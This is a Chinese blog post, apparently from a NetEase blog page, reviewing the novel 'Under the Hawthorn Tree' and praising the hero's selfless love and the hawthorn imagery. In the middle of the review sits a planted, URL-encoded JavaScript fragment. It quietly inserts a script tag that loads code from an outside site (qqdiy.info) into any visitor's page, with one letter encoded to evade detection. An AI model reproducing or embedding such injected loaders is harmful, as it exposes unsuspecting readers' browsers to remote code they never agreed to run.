注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

慕契的博客

 
 
 

日志

 
 

闻到了山楂花的香气  

2011-03-01 15:31:44|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

                                                           闻到了山楂花的香气   -

                                                                       ----- 读《山楂树之恋》

    问世间男女,有多少是在无爱、错爱甚至是糊涂的爱中沉浮,消损生命?如此苦海中,倘若有一个人,(她或他)得到真了爱,该是多么幸福!即使他们的爱,种种原因,以悲剧告终,但毕竟历经过一番真爱的洗礼,刻骨铭心、透彻肺腑,所以仍然是幸福的!

      《山楂树之恋》写的就是那种生死恋,是那种倾心相与,让人心碎的爱情,让人羡慕!让人放不下!

      有人说,爱是一种痛苦。因为真爱的追求意味着无我、奉献、牺牲------在这凡事计较、讲条件,商品物资化的时代里,真的是要问一声,有谁:“倾其身心爱过”一个人?那样心相往,情相与,无时无刻,为对方想,理解她,帮助她,保护她,包容她,把一切献给她,要她幸福,要她快乐,不离不弃、至死不渝,让人“相信世界上是有永远的爱的”?这样至情至性的人,他的心,金子般闪闪发光,即使死神要夺去他的生命,还在为他的爱人设想、祝福!他的爱之投影,就这样深深镌刻在了被爱人的灵府,当他活着的时候,能够不断地从对方的欢乐、痛苦、幸福、悲伤中得到回应;即使死了,只要他爱的人活着,他就随她一起活,永远不死,这样的人,因一份至情而完美,而永生!也因此而幸福!这种幸福在这个把爱商品化的时代里很少有人体味得到了!

     《山楂树之恋》所写的小三,孙建新,就是这样一个完美的爱过的人,他的至情至性,碰触到人心深处雪藏已久的真情,因而没有人不喜欢他、欣赏他,且无不为他的过早离去而心痛、震颤!

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<     世上的女人哪个不渴望得到像小三那样男人的爱?但是多数女人没有,没有能够得到这样的爱。从这个意义上讲,小说中女主人公静秋是幸运而且幸福的。小三不但是她懵懂青春时期情感的启蒙导师,让她从纯洁的真爱中体味幸福欢乐,而且影响她认识社会,认识文革时期许多问题,像家庭出身,父母的政治问题,还有他们自己,告诉她不要为这些而轻看自己,“天生我材必有用”,告诉她“不要想太多,想太远,世界上的事情每天都在发生变化。”即使下到农村,总有一天会招工回来,即使永远不能,他会不离不弃,去陪她。小三大静秋六七岁,高干家庭出身,母亲文革中自杀,父亲复出后,选择了相对宽松的地质勘探队野外作业的工作。不同寻常的经历,使他政治上更成熟,视野更宽广,对于世事看得更为透彻深远,因而人性的展露也更为完美------。在这部静秋讲述的故事中,可以看出,正是小三的爱,擦拭掉静秋心灵镜面上的灰尘,帮她挣脱那个时代强加给她的条条框框,包括一个少女从可怕世事、母亲的教训中听来的,让她不能不警惕的心理障碍------,从而帮助这个少女的成长,不但以同样完美的人性回应了他的爱情,而且当巨大灾难降临时,也能够以女人的足够自信和坚强去承担!故事的后记告诉人们,静秋后来果然非常优秀。

可见,完美的爱情不但令人性更丰满的而且使思想成熟精神升华;使爱者生命发展延伸,也使被爱者幸福充盈!小三的爱就是这样!也是这个人物的魅力和力量之所在!

世上无处不存在美,美的事,美的人,但发现这些美,挖掘这些美,升华它,却不是人人做得到的。在小三和静秋的故事中,小三对爱的执著,隐藏在点点滴滴小事中的那份细腻、体贴、深情,特别是在遭遇所爱的误解、冷淡、抗拒,甚至敌意的时候,依然无怨无悔,一如既往,深情似海,采取一切方法去关心去帮助去爱,去融化对方的心------。直到这种爱,受到无可抵御的死神的打击,为了所爱的未来,他才退避,才隐去------。如此动人的爱情,让人倍感忧伤,但是倘若,只是平淡叙述,我们听到后也许也只是感动而已,小三的形象会慢慢模糊;可是不,小说的作者渲染了人物和故事的诗意美,借助美的意象,让人物在诗意翅膀的飞翔中,幻化和升华;并以意象美的具象,永远让人记住了!

这就是,山楂树,

还有山楂花,

还有《山楂树》的苏联歌曲------。

从开始到最后,山楂树都伴随着他们:

静秋初到坪西村所见到的就是山顶上那颗山楂树,听到有关抗日英雄埋在山楂树下的故事。

恍惚中她看见树下有一个穿白衣衬衣的青年。

初见老三前,远远的先听到的是老三手风琴拉出的《山楂树》琴声,以及他的同事低声应合唱的歌声,当时暮色霭霭,炊烟袅袅,这美的一幕,让少女魂牵梦绕。

他给她的初吻,是在望见山楂树不远的路上。

离别后,第一件礼物是悄悄送过去的一束山楂花。

静秋最爱老三送她的照片是在山楂树下所照,他英俊潇洒,迎风而站。

老三最后,埋在了山楂树下。

以后,多少年,每到五月份山楂花开放,静秋都到山楂树下看那红色的花,为他扫墓。

三十年祭日,静秋越洋,带着女儿来为他扫墓。

啊,山楂树,美丽的山楂树,站在高高山岗上的山楂树,守护着那青年魂魄的山楂树;啊,山楂花,美丽的山楂花,散发着芬芳的山楂花,笼罩着那青年的遗骸,抚慰着他的灵魂。我读他的故事,始终,都似乎闻到淡淡的山楂花的清香,那是从他的灵魂中散发出的香气,从他的生命中撒发出的香气,从他的爱情中散发着的香气!老三用他的尸骨滋养着山楂树,它们已经相融相合,成为一体!还有什么可以比拟他的生命比拟他的爱情?唯有这山楂树和这山楂树之恋!

我凭借着这美丽的山楂树和树上开放的山楂花的清香,永远记住了他和他的故事。

  评论这张
 
阅读(86)| 评论(18)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017